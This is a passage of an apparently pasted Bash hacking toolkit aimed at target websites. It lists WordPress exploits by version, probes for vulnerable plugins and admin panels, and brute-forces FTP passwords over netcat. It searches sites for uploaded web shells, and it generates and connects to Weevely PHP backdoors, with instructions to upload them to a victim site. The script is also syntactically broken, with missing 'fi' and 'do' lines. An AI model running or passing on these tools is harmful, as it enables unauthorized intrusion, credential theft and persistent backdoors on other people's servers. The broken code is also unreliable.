- 3.1.1)
- ;;
- 3.1)
- ;;
- 3.0.6)
- ;;
- 3.0.5)
- ;;
- 3.0.4)
- ;;
- 3.0.3)
- ;;
- 3.0.2)
- ;;
- 3.0.1)
- ;;
- 3.0)
- ;;
- 2.9.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/11441/ (>= 2.9)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10825/ (<= 2.9.x)"
- echo
- ;;
- 2.9.1)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/11441/ (>= 2.9)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10825/ (<= 2.9.x)"
- echo
- ;;
- 2.9)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/11441/ (>= 2.9)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10825/ (<= 2.9.x)"
- echo
- ;;
- 2.8.6)
- ;;
- 2.8.5)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
- echo
- ;;
- 2.8.4)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
- echo
- ;;
- 2.8.3)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/9410/ (<= 2.8.3)"
- echo
- ;;
- 2.8.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/9410/ (<= 2.8.3)"
- echo
- ;;
- 2.8.1)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/9410/ (<= 2.8.3)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/9250/ (= 2.8.1)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/9110/ (<= 2.8.1)"
- echo
- ;;
- 2.8)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/9410/ (<= 2.8.3)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/9110/ (<= 2.8.1)"
- echo
- ;;
- 2.7.1)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10088/ (<= 2.7.1)"
- echo
- ;;
- 2.7)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/10088/ (<= 2.7.1)"
- echo
- ;;
- 2.6.5)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
- echo
- ;;
- 2.6.4)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
- echo
- ;;
- 2.6.3)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
- echo
- ;;
- 2.6.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
- echo
- ;;
- 2.6.1)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/6421/ (= 2.6.1)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/6397/ (= 2.6.1)"
- echo
- ;;
- 2.6)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
- echo
- ;;
- 2.5.1)
- ;;
- 2.5)
- ;;
- 2.3.3)
- ;;
- 2.3.2)
- ;;
- 2.3.1)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/4721/ (<= 2.3.1)"
- echo
- ;;
- 2.3)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/4721/ (<= 2.3.1)"
- echo
- ;;
- 2.2.3)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (< 2.2.x)"
- echo
- ;;
- 2.2.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (< 2.2.x)"
- echo
- ;;
- 2.2.1)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (< 2.2.x)"
- echo
- ;;
- 2.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/4039/ (= 2.2.x)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (< 2.2.x)"
- echo
- ;;
- 2.1.3)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3960/ (= 2.1.3)"
- echo
- ;;
- 2.1.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3656/ (= 2.1.2)"
- echo
- ;;
- 2.1.1)
- ;;
- 2.1)
- ;;
- 2.0.11)
- ;;
- 2.0.10)
- ;;
- 2.0.9)
- ;;
- 2.0.8)
- ;;
- 2.0.7)
- ;;
- 2.0.6)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
- echo
- ;;
- 2.0.5)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
- echo
- ;;
- 2.0.4)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
- echo
- ;;
- 2.0.3)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
- echo
- ;;
- 2.0.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/6/ (<= 2.0.2)"
- echo
- ;;
- 2.0.1)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/6/ (<= 2.0.2)"
- echo
- ;;
- 2.0)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/6/ (<= 2.0.2)"
- echo
- ;;
- 1.5.2)
- ;;
- 1.5.1.3)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3051/ (<= 1.5.1.3)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/1142/ (<= 1.5.1.3)"
- echo
- ;;
- 1.5.1.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3051/ (<= 1.5.1.3)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/1142/ (<= 1.5.1.3)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/1077/ (<= 1.5.1.2)"
- echo
- ;;
- 1.5.1.1)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/3051/ (<= 1.5.1.3)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/1142/ (<= 1.5.1.3)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/1077/ (<= 1.5.1.2)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/1059/ (<= 1.5.1.1)"
- echo -e " $STRXPL http://www.exploit-db.com/exploits/1033/ (<= 1.5.1.1)"
- echo
- ;;
- 1.3.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/5066/ (<= 1.3.2)"
- echo
- ;;
- 1.2.2)
- echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (<= 1.2.2)"
- echo
- ;;
- *)
- echo -e " $STRXPL 0 (None)"
- echo
- ;;
- esac
- echo
- echo -e "$YELLOW <^> Wordpress Vulnerable Plugins <^> $NO"
- echo
- for x in ${vulns[*]}; do
- code=`$CURL -A $BANNER -sL -w "%{http_code}\\n" $web${vulns[$i]} -o "/dev/null"`
- echo -e "$YELLOW [+] TESTED PLUGINS: $NO $i / $TOTALTEST"
- if [ $i -le 9 ]; then
- echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
- echo " [$i] -> $web${vulns[$i]}"
- elif [ $i -le 99 ]; then
- echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
- echo " [$i] -> $web${vulns[$i]}"
- else
- echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
- echo " [$i] -> $web${vulns[$i]}"
- fi
- if [ "$code" == "200" ]; then
- echo -e "$RED [+] EXPLOIT:$NO ${ref[$i]}"
- echo
- fi
- XPL[$y]=${vulns[$i]}
- XPLR[$y]=${ref[$i]}
- let XPLC=$XPLC+1
- let y=$y+1
- if [ "$code" == "404" ]; then
- echo "[+] 404 Not found Plugin Not found "
- let i=$i+1
- sleep $TIME
- done
- #Summary
- echo
- echo -e "$BLUE<^>---------------- [- $RED Scanning Results $BLUE -]"
- echo
- echo -e " $GREEN
- ____ ____ ____ ____ ___ ___ ____ ____ _ _ __ ___
- (_ _)( _ \ ___ ( _ \(_ _)/ __) / __)( ___)( _ \ ( \/ ) /. | / _ \
- _)(_ )___/ (___) )(_) )_)(_( (_-.( (_-. )__) ) / \ / (_ _) ( (_) )
- (____)(__) (____/(____)\___/ \___/(____)(_)\_) \/ (_) () \___/
- $RED
- ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
- /W\ /O\ /R\ /D\ /P\ /E\ /S\ /S\ /D\ /U\ /M\ /P\ /E\ /D\ /R\ /E\ /S\ /U\ /L\ /T\ /S\
- <___><___><___><___><___><___><___><___> <___><___><___><___><___><___> <___><___><___><___><___><___><___>
- echo -e "
- ____ ____ ____ ____ ___ ___ ____ ____ _ _ __ ___
- (_ _)( _ \ ___ ( _ \(_ _)/ __) / __)( ___)( _ \ ( \/ ) /. | / _ \
- _)(_ )___/ (___) )(_) )_)(_( (_-.( (_-. )__) ) / \ / (_ _) ( (_) )
- (____)(__) (____/(____)\___/ \___/(____)(_)\_) \/ (_) () \___/
- ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
- /W\ /O\ /R\ /D\ /P\ /E\ /S\ /S\ /D\ /U\ /M\ /P\ /E\ /D\ /R\ /E\ /S\ /U\ /L\ /T\ /S\
- <___><___><___><___><___><___><___><___> <___><___><___><___><___><___> <___><___><___><___><___><___><___>
- \n" >>$LOGFILE
- echo -e "$RED [+] Report Date :- [$YELLOW " `date` "$RED ]"
- echo -e "[+] Report Date :- [ "`date`" ] \n" >> $LOGFILE
- echo
- echo -e "$RED [+] Website :- $YELLOW $web"
- echo "[+] Website :- $web " >> $LOGFILE
- echo -e "$RED [+] Vulnerable Plugins In Database:- $YELLOW $XPLC"
- echo -e "[+] Vulnerable Plugins :- $XPLC" >> $LOGFILE
- echo
- echo -e "$RED [+] Wordpress Version :- $YELLOW $VERSION"
- echo -e "[+] Wordpress Version :- $VERSION" >> $LOGFILE
- echo
- for x in ${XPL[*]}; do
- echo -e "$RED [$z]$YELLOW ${XPL[$z]}"
- echo -e " [$z] ${XPL[$z]}" >> $LOGFILE
- echo -e "$RED EXPLOIT:$YELLOW ${XPLR[$z]}"
- echo -e " EXPLOIT: ${XPLR[$z]}" >> $LOGFILE
- echo
- let z=$z+1
- done
- echo
- echo -e " $GREEN Result Has been save in IP-Digger_Wordpress_scan File $RED ;-)"
- echo
- #=========================================================================================================================================
- #<!--- NSLOOKUP LOOP ---!>
- if [ "$mychoice" = "16" ]; then
- {
- echo
- echo " !-------------- NS LOOKUP --------------! "
- echo -e " \e[1;31m Coded By Un_N0n "
- echo
- echo -e " \e[1;31m =========================================================\e[0m"
- echo
- read -p " # ~ >> Enter The Website Here : " addr
- # No input
- if [ -z $addr ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- LOOP FOR STORING THE RESULT IN FILE ---!>
- echo
- read -p " Do you want to store the results in a file ? y/n -> " ans
- if [ "$ans" = "y" ]; then
- {
- echo -e " \e[1;32mPlease wait while results being generated.\e[0m"
- res=`nslookup $addr > lookup_results`
- echo
- echo -e " \e[1;36m[+] Done. The Info Has Been Stored in File Named Lookup_Results, change its name to prevent overwrite. [+]\e[0m"
- echo
- echo "!-###############################################################-!"
- echo
- }
- else
- {
- echo -e " \e[1;32mPlease wait while results being generated.\e[0m"
- res=`nslookup $addr`
- echo
- echo " The results are :- "
- echo "------------------------------------------------------------------"
- echo -e " \e[1;32m$res\e[0m"
- echo
- echo "!-###############################################################-!"
- echo
- read -p "Press Enter to Cont"
- }
- fi
- #<!--- STORING SCRIPT ENDS HERE ---!>
- }
- fi
- #<!--- NSLOOKUP LOOP ENDS HERE ---!>
- #=================================================================================================
- #FTP Brute
- if [ "$mychoice" = "17" ]; then
- {
- echo " !--------- FTP Brute Forcer ---------!"
- echo " By - Un_N0n "
- echo
- echo
- echo -e " \e[1;36m =========================================================== \e[0m"
- echo
- echo
- read -p "# ~ >> Enter IP ADDR Here : " addr
- read -p "# ~ >> Enter the Port ADDR/ For FTP :- 21 : " paddr
- read -p "# ~ >> Enter the UserName : " uaddr
- read -p "# ~ >> Enter the Path of Wordlist : " waddr
- #<!--- IF STATMENT TO CHECK BLANK INPUT -----------------!>
- if [ -z $addr ]; then
- {
- echo
- echo "XXXXXXXXXXXXXXXXXX-----------XXXXXXXXXXXXXXXXXXXXX"
- echo
- echo -e " \e[1;31mERROR - Blank Input detected.\e[0m"
- echo
- echo "XXXXXXXXXXXXXXXXXX-----------XXXXXXXXXXXXXXXXXXXXX"
- exit
- }
- fi
- #<!--- IF STATMENT FOR BLANK INPUT CHECKING ENDS HERE ---!>
- #<!--- IF STATMENT FOR PUTTING DATA INTO FILE ---!>
- echo
- echo -e "\e[1;32m [*] Connecting... \e[0m"
- echo -e "\e[1;31m [*] Connected , Starting process.. \e[0m"
- echo
- #=============== MAIN CODE FTP BRUTE FROCE BY FURT3X =================
- blklog[1]="/tmp/ftplogz"
- blklog[2]="/tmp/ftplogz2"
- function brute_help() {
- cat <<EOF
- `basename $0` <host_ip> <port> <user> <wordlist>
- `basename $0` 127.0.0.1 21 administrador worlista
- function verde(){
- echo -e "\031[01;32m${@}\032[00m"
- vitima=$addr
- porta=$paddr
- usuario=$uaddr
- wordlista=$waddr
- nc -h >/dev/null 2>/dev/null
- if [ "$?" -eq "127" ];
- then
- echo "need netcat"
- exit
- verde " [*] shbrute netcat ftp brute force"
- echo
- function anonymous(){
- verde " [*] Testing if permit anonymous login"
- #### Ugly but has worked for me ####
- #####################################
- echo "USER anonymous" > ${blklog[1]}; echo "PASS ftp" >>${blklog[1]}; echo "QUIT" >>${blklog[1]}
- nc ${vitima} ${porta} < ${blklog[1]} > ${blklog[2]}
- cat ${blklog[2]} | grep "230" >/dev/null
- if [ "$?" -eq "0" ];
- then
- verde " \e[1;31m[*] Permit anonymous login\e[0m"
- echo
- else
- verde " \e[1;31m[*] Not permit anonymous login\e[0m"
- echo
- function ftpbrute(){
- if [ ! -f "${wordlista}" ];
- then
- echo "wordlist not found"
- exit
- if [ ! -s "${wordlista}" ];
- then
- echo "wordlist not found"
- exit
- verde " [*] Brute Forcing ftp ${vitima}"
- echo
- cat "${wordlista}" |
- while read linhas
- echo "USER ${usuario}" > ${blklog[1]} ; echo "PASS ${linhas}" >> ${blklog[1]} ; echo "QUIT" >> ${blklog[1]}
- nc ${vitima} ${porta} < ${blklog[1]} > ${blklog[2]}
- sleep 0.1
- verde " Trying : ${linhas}"
- cat ${blklog[2]} | grep "230" >/dev/null
- if [ "$?" -eq "0" ];
- then
- echo
- verde " \e[1;31mUser:\e[0m ${usuario}"
- verde " \e[1;31mPass:\e[0m $linhas"
- exit
- fi
- done
- anonymous
- ftpbrute
- echo
- read -p "Press Enter to Cont. : "
- echo "-------------------------------------------------------------"
- echo
- #============== MAIN CODE ENDS =================
- #<!--- IF STATMENT FOR PUTTING DATA INTO FILE ENDS HERE ---!>
- }
- #==================================================================================================
- #<!--- FTP BRUTE FORCER ENDS ---!>
- #==================================================================================================
- #Admin Pnel Finer
- if [ "$mychoice" = "18" ]; then
- echo -e " \e[1;31m !--------- Admin Page Finder ---------!"
- echo -e " \e[1;31m By - Hind Hacker \e[0m"
- echo
- echo -e " \e[1;33m [+]Bugs Removed by - Manoj Nath "
- echo -e " [+] Admin Panel List by Silent Hacker ( Created on my own experience ) "
- echo -e " \e[1;36m =========================================================== \e[0m"
- echo
- var=0
- var2=0
- var3=0
- RED='\e[0;31m'
- GREEN='\e[0;32m'
- BLUE='\e[4;36m'
- echo -n "Enter the website ( For example :- http://www.target.com/ ):- "
- read site
- echo -n "Admin Panel List ( For example ( Default File ) :- admin ) : "
- read admin
- echo
- if [ -z "$site" ];then
- echo -e "\e[1;31m Blank Input Detected in Website Link :P \e[0m"
- echo
- exit
- if [ -z "$admin" ]; then
- echo -e " \e[1;31mBlank Input in Admin List detected :P \e[0m "
- echo
- exit
- echo -e "\e[1;31m [+] Scanning Target :- $site \e[0m"
- exec<$admin
- while read line
- var3=`expr $var3 + 1`
- url=`(curl $site$line --head) 2>&1 | grep "HTTP" | cut -d " " -f 2`
- case $url in
- 200 ) echo -e "$site$line $GREEN<--Success!!!" && tput sgr0 && var=`expr $var + 1`
- 302 ) echo -e "$site$line $BLUE<--Possible (302)" && tput sgr0 && var2=`expr $var2 + 1`
- 404 ) echo -en "$site$line $RED<-- Failed \r" && tput sgr0
- esac
- done
- tput sgr0
- echo -e " "
- echo -e " "
- echo -e "$var admin pages."
- echo -e "$var2 302 pages."
- echo -e "$var3 total pages tested."
- echo
- read -p "Press Enter : "
- echo
- exit
- #================================== Admin panel finder ends ======================================
- #Uni-Scan Scanning Script
- if [ "$mychoice" = "21" ]; then
- echo -e "\e[1;31m <^> UniScan v5.3 Web Vulnerability Scanner <^> \e[0m"
- echo
- echo -e "\e[1;31m [+] This tool is not coded by Freak Coderz [+] \e[0m"
- echo
- read -p "[+] Enter Website URL ( For example :- http://www.target.com/ ) :- " web
- #Blank input
- if [ -z $web ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- echo
- echo -e "\e[1;32mScanning $web for the Vulnerabilities xD , This may take time so please be patience :) \e[0m"
- res=`cd /pentest/web/uniscan; ./uniscan.pl -u $web -qweds | grep -v '*' | grep -v 'Searching' | grep '.'`
- echo
- echo "<----------------------------------------------------------------------------------->"
- echo -e "<^> Result of $web :-"
- echo
- echo -e "\e[1;31m$res\e[0m"
- echo "<----------------------------------------------------------------------------------->"
- read " Press Enter to continue xD"
- #Uploaded shell finder
- if [ "$mychoice" = "22" ]; then
- #All variables
- TIME="0" # sleep time among each request
- CURL="/usr/bin/curl"
- GREP="/bin/grep"
- CUT="/usr/bin/cut"
- #Colors
- red="\e[1;31m"
- green="\e[1;32m"
- yellow="\e[1;33m"
- blue="\e[1;34m"
- white="\e[1;30m"
- no="\e[0m"
- #Firefox BAnner
- BANNER="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
- #Error script
- get_error() {
- echo -e "\n\tError, incorrect parameters\n"
- exit 1
- echo
- echo -e "$green <^>---------------> IP-DiggEr Uploaded Shell Finder -------------------><^>"
- echo -e "$green - Coded by Silent_Hacker ( Manoj Nath )$no"
- echo
- echo -e
- read -p " Enter the website ( For Example :- http://www.target.com/ ) :- " web
- if [ -z "$web" ]; then
- get_error
- #Uploaded shells
- shells[0]="c99.php"
- shells[1]="templates/c99.php"
- shells[2]="includes/c99.php"
- shells[3]="uploads/c99.php"
- shells[4]="media/c99.php"
- shells[5]="C99.php"
- shells[6]="sok.php"
- shells[7]="king.php"
- shells[8]="c100.php"
- shells[9]="config.php"
- shells[10]="templates/config.php"
- shells[11]="images/config.php"
- shells[12]="media/config.php"
- shells[13]="sql.php"
- shells[14]="templates/sql.php"
- shells[15]="includes/sql.php"
- shells[16]="tmp/sql.php"
- shells[17]="files/sql.php"
- shells[18]="uploads/sql.php"
- shells[19]="images/sql.php"
- shells[20]="media/sql.php"
- shells[21]="changeall.php"
- shells[22]="cpn.php"
- shells[23]="templates/cpn.php"
- shells[24]="Cpanel.php"
- shells[25]="style.php"
- shells[26]="pak.php"
- shells[27]="WSO.php"
- shells[29]="teamr00t.php"
- shells[30]="sym.php"
- shells[31]="media/sym.php"
- shells[32]="uploads/sym.php"
- shells[33]="zone-h.php"
- shells[34]="templates/zone-h.php"
- shells[35]="uploads/zone-h.php"
- shells[36]="shell.php"
- shells[37]="includes/shell.php"
- shells[38]="tmp/shell.php"
- shells[39]="files/shell.php"
- shells[39]="uploads/shell.php"
- shells[40]="madspot.php"
- shells[41]="madspotshell.php"
- shells[42]="mad.php"
- shells[43]="files/madspot.php"
- shells[44]="uploads/madspot.php"
- shells[45]="images/madspot.php"
- shells[46]="templates/madspotshell.php"
- shells[47]="includes/madspotshell.php"
- shells[48]="tmp/madspotshell.php"
- shells[49]="files/madspotshell.php"
- shells[50]="uploads/madspotshell.php"
- shells[51]="images/madspotshell.php"
- shells[52]="media/madspotshell.php"
- shells[53]="itsecteam.php"
- shells[54]="templates/itsecteam.php"
- shells[55]="includes/itsecteam.php"
- shells[56]="tmp/itsecteam.php"
- shells[57]="files/itsecteam.php"
- shells[58]="uploads/itsecteam.php"
- shells[59]="anon.php"
- shells[60]="files/anon.php"
- shells[61]="uploads/anon.php"
- shells[62]="images/anon.php"
- shells[63]="media/anon.php"
- shells[64]="x.php"
- shells[65]="h4xor.php"
- shells[66]="whmcs.php"
- shells[67]="templates/whmcs.php"
- shells[68]="includes/whmcs.php"
- shells[69]="files/whmcs.php"
- shells[70]="uploads/whmcs.php"
- shells[71]="b347k.php"
- shells[72]="templates/b347k.php"
- shells[73]="includes/b347k.php"
- shells[74]="files/b347k.php"
- shells[75]="uploads/b347k.php"
- shells[76]="images/b347k.php"
- shells[77]="media/b347k.php"
- OIFS=$IFS
- IFS=""
- XPLC="0" # Number of Shells found
- XPL="" # SHells Found
- TOTALTEST=${#shells[@]}
- let "TOTALTEST -= 1" # Total Shells
- echo
- echo -e "$yellow Scanning $web for the Uploaded shell xD $no"
- echo
- echo -e "$yellow Total Shells in our databse :-$no $TOTALTEST"
- echo
- echo -e "$yellow Search started for Uploaded shell in $web"
- for x in ${shells[*]}; do
- code=`$CURL -A $BANNER -sL -w "%{http_code}\\n" $web${shells[$i]} -o "/dev/null"`
- echo -en "$B [+] Total Shells in our database: $i / $TOTALTEST"
- if [ $i -le 9 ]; then
- echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
- echo -n " [$i] -> $web${shells[$i]}"
- elif [ $i -le 99 ]; then
- echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
- echo -n " [$i] -> $web${shells[$i]}"
- else
- echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
- echo -n " [$i] -> $web${shells[$i]}"
- fi
- if [ "$code" == "200" ]; then
- echo -e " Shell found :- $web[XPL] $no"
- XPL[$y]=${shells[$i]}
- let XPLC=$XPLC+1
- let y=$y+1
- if [ "$code" == "404" ]; then
- echo -e " Shell Not found "
- let i=$i+1
- sleep $TIME
- done
- echo
- echo -e "-----------------------> $red Result of the Scanning <----------------------------------"
- echo
- echo -e "$yellow [+] Report Date :- [$red " `date` "$no ]"
- echo
- echo -e "$yellow [+] Website :- $red $web"
- echo
- echo -e "$yellow [+] Uploaded shells found :- $XPLC "
- echo
- for x in ${XPL[*]}; do
- echo -e "$yellow [$z]$no ${XPL[$z]}"
- echo
- let z=$z+1
- done
- read -p " Thanx for using xD"
- exit
- #Websploit T0olKit
- if [ "$mychoice" = "25" ];then
- cd /pentest/exploits/websploit; python websploit
- #Weevely Backd0or Generat0r
- if [ "$mychoice" = "23" ]; then
- echo -e "\e[1;33m <---------------------------------> Weevely BackD0or Generat0r <---------------------------------> "
- echo
- echo -e "\e[1;33m [+] Weevely is not coded by Us but simplified by Silent Hacker xD \e[0m "
- echo
- echo
- read -p "[+] Enter the Password For your Backd0or :- " password
- read -p "[+] Name of the Backdoor ( For Example Freak.php ):- " name
- dir="/root/Desktop/$name"
- #no input
- if [ -z $password ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input For Password \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- if [ -z $name ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input For Name \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- res=`cd /pentest/web/backdoors/weevely; python weevely.py generate $password $dir`
- echo
- echo -e "\e[1;35m Successfully Generated Your Backd0or With Password :-\e[1;34m $password\e[0m \e[1;35mand Name :-\e[1;34m $name \e[0m\e[1;35min the Desktop "
- echo -e "\e[1;35mNow Upload your backdoor in the website and change the permission of the Backd0or to 0755 \e[0m"
- read -p " Press Enter to C0ntinue "
- #Weevely Backdo0r Conn3ct0r :D
- if [ "$mychoice" = "24" ]; then
- echo -e "\e[1;33m <---------------------------------> Weevely BackD0or Server Connect0r <---------------------------------> "
- echo
- echo -e "\e[1;33m After creating backdoor and changing permission Now time to connect with the Backd0or \e[0m "
- echo
- echo
- echo
- read -p "[+] Enter the Link of the Uploaded Backd0or ( Example :- http://www.target.com/back.php ):- " link
- read -p "[+] Enter the Password of the Backd0or :- " pass
- #Blank inputs
- if [ -z $link ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input For Webdo0r link \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- if [ -z $pass ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input For Password \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- cd /pentest/web/backdoors/weevely; python weevely.py $link $pass
- # JOOM SCAN SCRIPT
- if [ "$mychoice" = "19" ]; then
- echo -e "\e[1;31m <^> Joomla Vulnerability Scanner v 1.0 <^> \e[0m"
- echo
- echo -e "\e[1;31m Sil3nt_H4x0r - This tools helps in searching the Vulnerability in the Joomla Websites xD \e[0m"
- echo
- read -p "[+] Enter the Website Url :- " url
- #<!--- IF STATMENT STARTS TO CHECK BLANK INPUT---!>
- if [ -z $url ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- echo
- read -p " Do You want to create a seperate .txt file for the result Yes/No " ans
- if [ "$ans" = "Yes" ]; then
- echo -e " \e[1;32m[*] Scanning $url for the Vulnerability This may take time so, Please be Patience \e[0m"
- cd /pentest/web/joomscan; ./joomscan.pl -u $url | grep -v '*' | grep -v 'Searching' | grep '.' > joomla_results
- mv joomla_results -t /root/Desktop
- echo
- echo -e "\e[1;35m [+] Results have been saved in the Desktop with file name joomla_results , Change the File name to prevent Over write xD "
- echo
- echo -e "\e[1;31m ---------------------------------------------------------<^>----------------------------------------------------------"
- else
- echo -e " \e[1;31m[*] Scanning $url for the Vulnerability This may take time so, Please be Patience \e[0m"
- res=`cd /pentest/web/joomscan; ./joomscan.pl -u $url | grep -v '*' | grep -v 'Searching' | grep '.'`
- echo
- echo " Result of the Joom Scan :- "
- echo "----------------------------<^>----------------------------"
- echo -e "\e[1;31m$res\e[0m"
- echo
- echo "----------------------------<^>----------------------------"
- echo
- read -p "Press Enter to Cont"
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement